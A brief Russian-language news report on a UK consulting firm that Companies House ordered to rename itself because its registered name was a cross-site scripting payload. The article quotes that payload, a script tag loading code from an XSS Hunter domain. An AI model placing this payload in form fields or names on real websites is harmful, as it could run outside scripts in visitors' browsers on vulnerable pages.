Британскую компанию обязали сменить название, потому что оно провоцировало атаки на веб-сайты
Регистрационная палата Великобритании обязала местную консалтинговую компанию сменить название после того, как было установлено, что оно может провоцировать запуск XSS-атаки (межсайтовый скриптинг) на уязвимые веб-страницы. Одним из таких уязвимых веб-ресурсов является сайт самой Регистрационной палаты.
По сообщению издания The Guardian, прошлом известно немало случаев, когда основатели компаний в качестве шутки используют в названии своих предприятий части кода. На этот раз речь идет о британской консалтинговой компании под названием ““><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD”. Было установлено, что такое имя может нести опасность веб-ресурсам, не способным корректно обрабатывать HTML-форматирование. Это могло приводить к загрузке и выполнению скрипта с платформы XSS Hunter, которая используется для поиска уязвимостей, связанных с межсайтовым скриптингом.
Согласно данным издания, это не несет какой-либо опасности, однако, Регистрационная палата всё же обязала владельца компании сменить название. Теперь компания называется «THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD» (Компания, в названии которой были HTML-теги). На фоне этого в Регистрационной палате заявили о намерении внести поправки в действующие нормы регистрации названий компаний, чтобы избежать возникновение подобных инцидентов в будущем.